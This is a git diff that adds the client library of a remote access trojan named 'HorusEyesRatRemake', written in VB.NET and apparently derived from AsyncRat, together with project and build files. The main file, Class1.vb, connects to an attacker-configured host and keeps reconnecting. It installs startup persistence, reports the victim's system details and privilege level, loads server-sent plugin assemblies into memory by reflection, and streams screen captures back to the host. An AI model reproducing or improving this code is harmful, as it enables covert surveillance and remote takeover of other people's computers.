diff --git a/.vs/HorusEyesRatRemake/v16/.suo b/.vs/HorusEyesRatRemake/v16/.suo index 9133344..53f1393 100644 Binary files a/.vs/HorusEyesRatRemake/v16/.suo and b/.vs/HorusEyesRatRemake/v16/.suo differ diff --git a/ClassLibrary1/Class1.vb b/ClassLibrary1/Class1.vb new file mode 100644 index 0000000..4d5d4a1 --- /dev/null +++ b/ClassLibrary1/Class1.vb @@ -0,0 +1,446 @@ +Imports System.Drawing +Imports System.Drawing.Drawing2D +Imports System.Drawing.Imaging +Imports System.Globalization +Imports System.Net +Imports System.Net.Sockets +Imports System.Runtime.InteropServices +Imports System.Runtime.Serialization.Formatters.Binary +Imports System.Security.Principal +Imports System.Threading +Imports System.Windows.Forms +Imports PacketLib.Packet + +Public Class Class1 + Private Property H As String + Private Property P As String + Private Property Install_D As String + Private Property Install_N As String + Private Property Install_T As String + + Private T As TcpClient = New TcpClient() + + Sub New(ByVal HH As String, ByVal PP As String, ByVal IInstall_D As String, ByVal IInstall_N As String, ByVal IInstall_T As String) + Me.H = HH + Me.P = PP + Me.Install_D = IInstall_D + Me.Install_N = IInstall_N + Me.Install_T = IInstall_T + End Sub + + + Public Function CheckDNS() + Dim l As IPAddress() = Dns.GetHostAddresses(H) + + For Each IP In l + If IP.AddressFamily = Sockets.AddressFamily.InterNetwork Then + Return IP.ToString + End If + Next + End Function + + + Public Sub Check() + + Dim b As Byte() = System.Text.Encoding.UTF8.GetBytes("") + While True + + Thread.Sleep(1000) + + Try + + T.GetStream.Write(b, 0, b.Length) + + Catch ex As Exception + + Try + T = New TcpClient + + T.Connect(IPAddress.Parse(CheckDNS()), Integer.Parse(P)) + + If T.Connected = True Then + Dim N As NetworkStream = T.GetStream() + Dim O As New Threading.Thread(Sub() R(N)) + O.Start() + End If + + Catch ex + + End Try + + + End Try + + End While + End Sub + + + Public Sub First() + + If Install_D = "True" Then + + Dim O As New Options.Options(Install_N) + + Options.Options.StartUp(Install_T) + + End If + + Options.Options.oneInstance() + + SetCurrentDirectoryA(IO.Path.GetTempPath) ''To write file later + SetPriorityClass(Process.GetCurrentProcess.Handle, dwPriorityClass.ABOVE_NORMAL_PRIORITY_CLASS Or dwPriorityClass.PROCESS_MODE_BACKGROUND_BEGIN) + SetProcessPriorityBoost(Process.GetCurrentProcess.Handle, False) + SetThreadExecutionState(EXECUTION_STATE.ES_CONTINUOUS Or EXECUTION_STATE.ES_DISPLAY_REQUIRED Or EXECUTION_STATE.ES_SYSTEM_REQUIRED Or EXECUTION_STATE.ES_AWAYMODE_REQUIRED) + + + Try + + T.Connect(IPAddress.Parse(CheckDNS()), Integer.Parse(P)) + + If T.Connected = True Then + Dim N As NetworkStream = T.GetStream() + Dim O As New Threading.Thread(Sub() R(N)) + O.Start() + End If + + Catch ex As Exception + + + While T.Connected = False + + + Try + T.Connect(IPAddress.Parse(CheckDNS), Integer.Parse(P)) + + If T.Connected = True Then + Dim N As NetworkStream = T.GetStream() + Dim O As New Threading.Thread(Sub() R(N)) + O.Start() + End If + + Catch exs As Exception + + End Try + End While + + End Try + + Dim Checker_ As New Thread(Sub() Check()) + + Checker_.Start() + End Sub + Public Sub R(ByVal L As NetworkStream) + + + Try + + While True + + Dim sf As BinaryFormatter = New BinaryFormatter() + Dim packet As PacketMaker = CType(sf.Deserialize(L), PacketMaker) + + Select Case packet.Type_Packet + + Case PacketType.ID + + Dim I As New Microsoft.VisualBasic.Devices.Computer + + Dim D As New List(Of String) From { + I.Info.OSFullName, + Environment.UserName, + I.Info.OSVersion, + RegionInfo.CurrentRegion.Name & " - " & RegionInfo.CurrentRegion.EnglishName, + Process.GetCurrentProcess.Handle, + Privilege(), + Check64Bit() + } + + + Dim P As New PacketMaker With { + .Type_Packet = PacketType.ID, + .Misc = D.ToArray + } + + SyncLock T + sf.Serialize(L, P) + End SyncLock + + + + Case PacketType.PLUGIN + + ' Await Task.Run(Sub() Launch(T, packet.Plugin, packet.Function_Params)) + ' Dim THR As New Thread(Sub() Launch(T, packet.Plugin, packet.Function_Params)) + + ' THR.Start() + Launch(T, packet.Plugin, packet.Function_Params, False) + + Case PacketType.PLUGIN_C + + Launch(T, packet.Plugin, packet.Function_Params, True) + + Case PacketType.CLOSE + + NtTerminateProcess(Process.GetCurrentProcess.Handle, 0) + + Case PacketType.U_CLOSE + + Dim O As New Options.Options(Install_N) + + Options.Options.U_StartUp() + + Case PacketType.RD + + + Dim O As Object() = packet.Function_Params + + 'Dim THR As New Thread(Sub() Capture(O(0), O(1), O(2), O(3))) + ' THR.Start() + ' Await Task.Run(Sub() Capture(O(0), O(1), O(2), O(3))) + Capture(O(0), O(1), O(2), O(3)) + End Select + SetProcessWorkingSetSize(Process.GetCurrentProcess().Handle, -1, -1) + EmptyWorkingSet(Process.GetCurrentProcess.Handle) + End While + + Catch ex As Exception + + End Try + + End Sub + + + + Private Function Check64Bit() As String + If Environment.Is64BitProcess Then + Return "64" + Else + Return "32" + End If + End Function + Private Function Privilege() As String + Dim ID = WindowsIdentity.GetCurrent() + + Dim principal = New WindowsPrincipal(ID) + + If principal.IsInRole(WindowsBuiltInRole.Administrator) Then + + Return "Admin" + Else + Return "User" + End If + + End Function + + Private Function GetEncoderInfo(ByVal format As ImageFormat) As ImageCodecInfo + Try + Dim j As Integer + Dim encoders() As ImageCodecInfo + encoders = ImageCodecInfo.GetImageEncoders() + + j = 0 + While j < encoders.Length + If encoders(j).FormatID = format.Guid Then + Return encoders(j) + End If + j += 1 + End While + Return Nothing + Catch ex As Exception + End Try + End Function + + Public Async Sub Launch(ByVal k As TcpClient, ByVal B As Byte(), ByVal P As Object(), ByVal CSharp As Boolean) + 'Use synlock to avoid sending packet at same time and make collisions + 'Please do not use Async for this sub otherwise it will work partially lol + ' SyncLock T + + Try + + Dim assemblytoload As System.Reflection.Assembly = System.Reflection.Assembly.Load(B) + Dim method As System.Reflection.MethodInfo + If CSharp = False Then + method = assemblytoload.[GetType]("PL.Main").GetMethod("Main") + Else + + method = assemblytoload.[GetType]("PL.Main").GetMethod("main") + End If + + + Dim obj As Object = assemblytoload.CreateInstance(method.Name) + + Await Task.Run(Sub() method.Invoke(obj, New Object() {k, P})) + ' + ' method.Invoke(obj, New Object() {k, P}) + + ' End SyncLock + + Catch ex As Exception + + End Try + GC.Collect() + GC.WaitForPendingFinalizers() + SetProcessWorkingSetSize(Process.GetCurrentProcess().Handle, -1, -1) + EmptyWorkingSet(Process.GetCurrentProcess.Handle) + End Sub + ''Comes from AsyncRat VBNET rewritten by Arsium + Public Sub Capture(ByVal W As Integer, ByVal H As Integer, ByVal Q As Integer, ByVal F As String) + + Try + + Dim img As New Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height) + + Dim graphics As Graphics = Graphics.FromImage(img) + + graphics.CompositingQuality = Drawing2D.CompositingQuality.HighSpeed + + + graphics.CopyFromScreen(0, 0, 0, 0, New Size(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height), CopyPixelOperation.SourceCopy) + + Dim P As New Point + + GetCursorPos(P) + + Dim CS As New CURSORINFOHELPER + + CS.cbSize = Marshal.SizeOf(CS) + + GetCursorInfo(CS) + + If CS.flags = &H1 Then ''SO IMPORTANT TO CHECK IF CURSOR IS NOT HIDDEN ! Else will crash without error message + ' + graphics.DrawIcon(Icon.FromHandle(CS.hCursor), P.X, P.Y) + + End If + + Dim Resize As New Bitmap(W, H) + Dim g2 As Graphics = Graphics.FromImage(Resize) + g2.CompositingQuality = CompositingQuality.HighSpeed + g2.DrawImage(img, New Rectangle(0, 0, W, H), New Rectangle(0, 0, Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height), GraphicsUnit.Pixel) + + Dim encoderParameter As EncoderParameter = New EncoderParameter(Imaging.Encoder.Quality, Q) + Dim encoderInfo As ImageCodecInfo + + If F = "PNG" Then + + encoderInfo = GetEncoderInfo(ImageFormat.Png) + + ElseIf F = "JPEG" Then + + encoderInfo = GetEncoderInfo(ImageFormat.Jpeg) + + ElseIf F = "GIF" Then + + encoderInfo = GetEncoderInfo(ImageFormat.Gif) + + End If + + Dim encoderParameters As EncoderParameters = New EncoderParameters(1) + encoderParameters.Param(0) = encoderParameter + + Dim MS As New IO.MemoryStream + Resize.Save(MS, encoderInfo, encoderParameters) + + + + Dim packet As New PacketMaker With { + .Misc = New Object() {MS.ToArray}, + .Type_Packet = PacketType.RD + } + + Dim Send As New Packet_Send With { + .Packet = packet + } + + SyncLock T + Send.Send(T.GetStream) + End SyncLock + + graphics.Dispose() + g2.Dispose() + img.Dispose() + Resize.Dispose() + MS.Dispose() + encoderParameter.Dispose() + encoderParameters.Dispose() + + Catch ex As Exception + End Try + + End Sub + + + Public Shared Function GetCursorInfo(ByRef pci As CURSORINFOHELPER) As Boolean + End Function + + + Public Shared Function GetCursorPos( ByRef lpPoint As Point) As Boolean + End Function + + + Structure CURSORINFOHELPER + + Public cbSize As Int32 + + Public flags As Int32 + + Public hCursor As IntPtr + + Public ptScreenPos As Point + + End Structure + + + Public Shared Function SetThreadExecutionState(ByVal esFlags As EXECUTION_STATE) As EXECUTION_STATE + End Function + + Public Enum EXECUTION_STATE As UInteger + + ES_CONTINUOUS = &H80000000UI + + ES_DISPLAY_REQUIRED = &H2 + + ES_SYSTEM_REQUIRED = &H1 + + ES_AWAYMODE_REQUIRED = &H40 + + End Enum + + + Public Shared Function SetPriorityClass(ByVal handle As IntPtr, ByVal dwPriorityClass As dwPriorityClass) As Boolean + End Function + + Public Enum dwPriorityClass As UInteger + + ABOVE_NORMAL_PRIORITY_CLASS = &H8000 + + BELOW_NORMAL_PRIORITY_CLASS = &H4000 + + HIGH_PRIORITY_CLASS = &H80 + + REALTIME_PRIORITY_CLASS = &H100 + + NORMAL_PRIORITY_CLASS = &H20 + + PROCESS_MODE_BACKGROUND_BEGIN = &H100000 + + IDLE_PRIORITY_CLASS = &H40 + + End Enum + + + Public Shared Function SetProcessPriorityBoost(ByVal handle As IntPtr, ByVal bDisablePriorityBoost As Boolean) As Boolean + End Function + + + Public Shared Function SetCurrentDirectoryA(ByVal path As String) As Boolean + End Function + + Declare Function SetProcessWorkingSetSize Lib "kernel32.dll" (ByVal process As IntPtr, ByVal minimumWorkingSetSize As Integer, ByVal maximumWorkingSetSize As Integer) As Integer + + + Public Shared Function EmptyWorkingSet(ByVal hfandle As IntPtr) As Boolean + End Function + + Private Declare Function NtTerminateProcess Lib "ntdll.dll" (hfandle As IntPtr, ErrorStatus As Integer) As UInteger +End Class diff --git a/ClassLibrary1/ClientDll.vbproj b/ClassLibrary1/ClientDll.vbproj new file mode 100644 index 0000000..2248546 --- /dev/null +++ b/ClassLibrary1/ClientDll.vbproj @@ -0,0 +1,129 @@ + + + + + + Debug + AnyCPU + {DD547A1D-5F83-4BA1-89F2-122D070802ED} + Library + ClassLibrary1 + ClassLibrary1 + 512 + Windows + v4.8 + true + + + + + true + full + true + true + bin\Debug\ + ClassLibrary1.xml + 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 + + + pdbonly + false + true + true + bin\Release\ + ClassLibrary1.xml + 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 + + + On + + + Binary + + + Off + + + On + + + + ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll + + + ..\Options\bin\Release\Options.dll + + + ..\PacketLib\bin\Release\PacketLib.dll + + + + + + + + + + + + + + + + + + + + + + + + + + + + + True + Application.myapp + + + True + True + Resources.resx + + + True + Settings.settings + True + + + + + VbMyResourcesResXFileCodeGenerator + Resources.Designer.vb + My.Resources + Designer + + + + + MyApplicationCodeGenerator + Application.Designer.vb + + + SettingsSingleFileGenerator + My + Settings.Designer.vb + + + + + + + + Ce projet fait référence à des packages NuGet qui sont manquants sur cet ordinateur. Utilisez l'option de restauration des packages NuGet pour les télécharger. Pour plus d'informations, consultez http://go.microsoft.com/fwlink/?LinkID=322105. Le fichier manquant est : {0}. + + + + + \ No newline at end of file diff --git a/ClassLibrary1/FodyWeavers.xml b/ClassLibrary1/FodyWeavers.xml new file mode 100644 index 0000000..5029e70 --- /dev/null +++ b/ClassLibrary1/FodyWeavers.xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/ClassLibrary1/FodyWeavers.xsd b/ClassLibrary1/FodyWeavers.xsd new file mode 100644 index 0000000..44a5374 --- /dev/null +++ b/ClassLibrary1/FodyWeavers.xsd @@ -0,0 +1,111 @@ + + + + + + + + + + + + A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks + + + + + A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. + + + + + A list of unmanaged 32 bit assembly names to include, delimited with line breaks. + + + + + A list of unmanaged 64 bit assembly names to include, delimited with line breaks. + + + + + The order of preloaded assemblies, delimited with line breaks. + + + + + + This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. + + + + + Controls if .pdbs for reference assemblies are also embedded. + + + + + Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. + + + + + As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. + + + + + Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. + + + + + Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. + + + + + A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | + + + + + A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. + + + + + A list of unmanaged 32 bit assembly names to include, delimited with |. + + + + + A list of unmanaged 64 bit assembly names to include, delimited with |. + + + + + The order of preloaded assemblies, delimited with |. + + + + + + + + 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. + + + + + A comma-separated list of error codes that can be safely ignored in assembly verification. + + + + + 'false' to turn off automatic generation of the XML Schema file. + + + + + \ No newline at end of file diff --git a/ClassLibrary1/My Project/Application.Designer.vb b/ClassLibrary1/My Project/Application.Designer.vb new file mode 100644 index 0000000..88dd01c --- /dev/null +++ b/ClassLibrary1/My Project/Application.Designer.vb @@ -0,0 +1,13 @@ +'------------------------------------------------------------------------------ +' +' This code was generated by a tool. +' Runtime Version:4.0.30319.42000 +' +' Changes to this file may cause incorrect behavior and will be lost if +' the code is regenerated. +' +'------------------------------------------------------------------------------ + +Option Strict On +Option Explicit On + diff --git a/ClassLibrary1/My Project/Application.myapp b/ClassLibrary1/My Project/Application.myapp new file mode 100644 index 0000000..758895d --- /dev/null +++ b/ClassLibrary1/My Project/Application.myapp @@ -0,0 +1,10 @@ + + + false + false + 0 + true + 0 + 1 + true + diff --git a/ClassLibrary1/My Project/AssemblyInfo.vb b/ClassLibrary1/My Project/AssemblyInfo.vb new file mode 100644 index 0000000..c544367 --- /dev/null +++ b/ClassLibrary1/My Project/AssemblyInfo.vb @@ -0,0 +1,35 @@ +Imports System +Imports System.Reflection +Imports System.Runtime.InteropServices + +' Les informations générales relatives à un assembly dépendent de +' l'ensemble d'attributs suivant. Pour modifier les informations +' associées à un assembly. + +' Vérifiez les valeurs des attributs de l'assembly + + + + + + + + + + +'Le GUID suivant est pour l'ID de la typelib si ce projet est exposé à COM + + +' Les informations de version pour un assembly se composent des quatre valeurs suivantes : +' +' Version principale +' Version secondaire +' Numéro de build +' Révision +' +' Vous pouvez spécifier toutes les valeurs ou indiquer les numéros de build et de révision par défaut +' en utilisant '*', comme indiqué ci-dessous : +' + + + diff --git a/ClassLibrary1/My Project/Resources.Designer.vb b/ClassLibrary1/My Project/Resources.Designer.vb new file mode 100644 index 0000000..d543b91 --- /dev/null +++ b/ClassLibrary1/My Project/Resources.Designer.vb @@ -0,0 +1,62 @@ +'------------------------------------------------------------------------------ +' +' This code was generated by a tool. +' Runtime Version:4.0.30319.42000 +' +' Changes to this file may cause incorrect behavior and will be lost if +' the code is regenerated. +' +'------------------------------------------------------------------------------ + +Option Strict On +Option Explicit On + + +Namespace My.Resources + + 'This class was auto-generated by the StronglyTypedResourceBuilder + 'class via a tool like ResGen or Visual Studio. + 'To add or remove a member, edit your .ResX file then rerun ResGen + 'with the /str option, or rebuild your VS project. + ''' + ''' A strongly-typed resource class, for looking up localized strings, etc. + ''' + _ + Friend Module Resources + + Private resourceMan As Global.System.Resources.ResourceManager + + Private resourceCulture As Global.System.Globalization.CultureInfo + + ''' + ''' Returns the cached ResourceManager instance used by this class. + ''' + _ + Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager + Get + If Object.ReferenceEquals(resourceMan, Nothing) Then + Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("ClassLibrary1.Resources", GetType(Resources).Assembly) + resourceMan = temp + End If + Return resourceMan + End Get + End Property + + ''' + ''' Overrides the current thread's CurrentUICulture property for all + ''' resource lookups using this strongly typed resource class. + ''' + _ + Friend Property Culture() As Global.System.Globalization.CultureInfo + Get + Return resourceCulture + End Get + Set(ByVal value As Global.System.Globalization.CultureInfo) + resourceCulture = value + End Set + End Property + End Module +End Namespace diff --git a/ClassLibrary1/My Project/Resources.resx b/ClassLibrary1/My Project/Resources.resx new file mode 100644 index 0000000..af7dbeb --- /dev/null +++ b/ClassLibrary1/My Project/Resources.resx @@ -0,0 +1,117 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/ClassLibrary1/My Project/Settings.Designer.vb b/ClassLibrary1/My Project/Settings.Designer.vb new file mode 100644 index 0000000..7c5ef7a --- /dev/null +++ b/ClassLibrary1/My Project/Settings.Designer.vb @@ -0,0 +1,73 @@ +'------------------------------------------------------------------------------ +' +' This code was generated by a tool. +' Runtime Version:4.0.30319.42000 +' +' Changes to this file may cause incorrect behavior and will be lost if +' the code is regenerated. +' +'------------------------------------------------------------------------------ + +Option Strict On +Option Explicit On + + +Namespace My + + _ + Partial Friend NotInheritable Class MySettings + Inherits Global.System.Configuration.ApplicationSettingsBase + + Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings), MySettings) + +#Region "My.Settings Auto-Save Functionality" +#If _MyType = "WindowsForms" Then + Private Shared addedHandler As Boolean + + Private Shared addedHandlerLockObject As New Object + + _ + Private Shared Sub AutoSaveSettings(ByVal sender As Global.System.Object, ByVal e As Global.System.EventArgs) + If My.Application.SaveMySettingsOnExit Then + My.Settings.Save() + End If + End Sub +#End If +#End Region + + Public Shared ReadOnly Property [Default]() As MySettings + Get + +#If _MyType = "WindowsForms" Then + If Not addedHandler Then + SyncLock addedHandlerLockObject + If Not addedHandler Then + AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings + addedHandler = True + End If + End SyncLock + End If +#End If + Return defaultInstance + End Get + End Property + End Class +End Namespace + +Namespace My + + _ + Friend Module MySettingsProperty + + _ + Friend ReadOnly Property Settings() As Global.ClassLibrary1.My.MySettings + Get + Return Global.ClassLibrary1.My.MySettings.Default + End Get + End Property + End Module +End Namespace diff --git a/ClassLibrary1/My Project/Settings.settings b/ClassLibrary1/My Project/Settings.settings new file mode 100644 index 0000000..85b890b --- /dev/null +++ b/ClassLibrary1/My Project/Settings.settings @@ -0,0 +1,7 @@ + + + + + + + diff --git a/ClassLibrary1/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/ClassLibrary1/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/ClassLibrary1/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.Resources.resources b/ClassLibrary1/obj/Release/ClassLibrary1.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/ClassLibrary1/obj/Release/ClassLibrary1.Resources.resources differ diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.dll b/ClassLibrary1/obj/Release/ClassLibrary1.dll new file mode 100644 index 0000000..a5e4035 Binary files /dev/null and b/ClassLibrary1/obj/Release/ClassLibrary1.dll differ diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.pdb b/ClassLibrary1/obj/Release/ClassLibrary1.pdb new file mode 100644 index 0000000..6bd388e Binary files /dev/null and b/ClassLibrary1/obj/Release/ClassLibrary1.pdb differ diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.CopyComplete b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.CoreCompileInputs.cache b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..84f530e --- /dev/null +++ b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +a91aa06214e12f44bc48da83d8481338ff6bd758 diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.FileListAbsolute.txt b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..b0b7cdc --- /dev/null +++ b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.FileListAbsolute.txt @@ -0,0 +1,13 @@ +Z:\HorusEyesRat-master\ClassLibrary1\bin\Release\ClassLibrary1.dll +Z:\HorusEyesRat-master\ClassLibrary1\bin\Release\ClassLibrary1.pdb +Z:\HorusEyesRat-master\ClassLibrary1\bin\Release\ClassLibrary1.xml +Z:\HorusEyesRat-master\ClassLibrary1\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.Resources.resources +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.vbproj.CopyComplete +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.dll +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.xml +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.pdb +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.vbprojAssemblyReference.cache diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.Fody.CopyLocal.cache b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..90e716b --- /dev/null +++ b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.xml diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.GenerateResource.cache b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.GenerateResource.cache new file mode 100644 index 0000000..e2584b3 Binary files /dev/null and b/ClassLibrary1/obj/Release/ClassLibrary1.vbproj.GenerateResource.cache differ diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.vbprojAssemblyReference.cache b/ClassLibrary1/obj/Release/ClassLibrary1.vbprojAssemblyReference.cache new file mode 100644 index 0000000..774d5a0 Binary files /dev/null and b/ClassLibrary1/obj/Release/ClassLibrary1.vbprojAssemblyReference.cache differ diff --git a/ClassLibrary1/obj/Release/ClassLibrary1.xml b/ClassLibrary1/obj/Release/ClassLibrary1.xml new file mode 100644 index 0000000..a26b729 --- /dev/null +++ b/ClassLibrary1/obj/Release/ClassLibrary1.xml @@ -0,0 +1,26 @@ + + + + +ClassLibrary1 + + + + + + A strongly-typed resource class, for looking up localized strings, etc. + + + + + Returns the cached ResourceManager instance used by this class. + + + + + Overrides the current thread's CurrentUICulture property for all + resource lookups using this strongly typed resource class. + + + + diff --git a/ClassLibrary1/obj/Release/ClientDll.vbproj.CopyComplete b/ClassLibrary1/obj/Release/ClientDll.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/ClassLibrary1/obj/Release/ClientDll.vbproj.CoreCompileInputs.cache b/ClassLibrary1/obj/Release/ClientDll.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..84f530e --- /dev/null +++ b/ClassLibrary1/obj/Release/ClientDll.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +a91aa06214e12f44bc48da83d8481338ff6bd758 diff --git a/ClassLibrary1/obj/Release/ClientDll.vbproj.FileListAbsolute.txt b/ClassLibrary1/obj/Release/ClientDll.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..a3c55be --- /dev/null +++ b/ClassLibrary1/obj/Release/ClientDll.vbproj.FileListAbsolute.txt @@ -0,0 +1,13 @@ +Z:\HorusEyesRat-master\ClassLibrary1\bin\Release\ClassLibrary1.dll +Z:\HorusEyesRat-master\ClassLibrary1\bin\Release\ClassLibrary1.pdb +Z:\HorusEyesRat-master\ClassLibrary1\bin\Release\ClassLibrary1.xml +Z:\HorusEyesRat-master\ClassLibrary1\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClientDll.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.Resources.resources +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClientDll.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClientDll.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClientDll.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClientDll.vbproj.CopyComplete +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.dll +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.xml +Z:\HorusEyesRat-master\ClassLibrary1\obj\Release\ClassLibrary1.pdb diff --git a/ClassLibrary1/obj/Release/ClientDll.vbproj.Fody.CopyLocal.cache b/ClassLibrary1/obj/Release/ClientDll.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..90e716b --- /dev/null +++ b/ClassLibrary1/obj/Release/ClientDll.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.xml diff --git a/ClassLibrary1/obj/Release/ClientDll.vbproj.GenerateResource.cache b/ClassLibrary1/obj/Release/ClientDll.vbproj.GenerateResource.cache new file mode 100644 index 0000000..e2584b3 Binary files /dev/null and b/ClassLibrary1/obj/Release/ClientDll.vbproj.GenerateResource.cache differ diff --git a/ClassLibrary1/obj/Release/ClientDll.vbprojAssemblyReference.cache b/ClassLibrary1/obj/Release/ClientDll.vbprojAssemblyReference.cache new file mode 100644 index 0000000..513cd1d Binary files /dev/null and b/ClassLibrary1/obj/Release/ClientDll.vbprojAssemblyReference.cache differ diff --git a/ClassLibrary1/obj/Release/Costura/006CE6175FD7479380D5725A404143BC2059E7D7.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/006CE6175FD7479380D5725A404143BC2059E7D7.costura.options.pdb.compressed new file mode 100644 index 0000000..23f1e88 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/006CE6175FD7479380D5725A404143BC2059E7D7.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed b/ClassLibrary1/obj/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed new file mode 100644 index 0000000..1b0e825 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed new file mode 100644 index 0000000..bbf7c79 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/26A50D1027619FA0C4D3A6BF1564B93A4203896A.costura.options.dll.compressed b/ClassLibrary1/obj/Release/Costura/26A50D1027619FA0C4D3A6BF1564B93A4203896A.costura.options.dll.compressed new file mode 100644 index 0000000..49c6d73 Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/26A50D1027619FA0C4D3A6BF1564B93A4203896A.costura.options.dll.compressed differ diff --git a/ClassLibrary1/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed b/ClassLibrary1/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..c113eae Binary files /dev/null and b/ClassLibrary1/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed differ diff --git 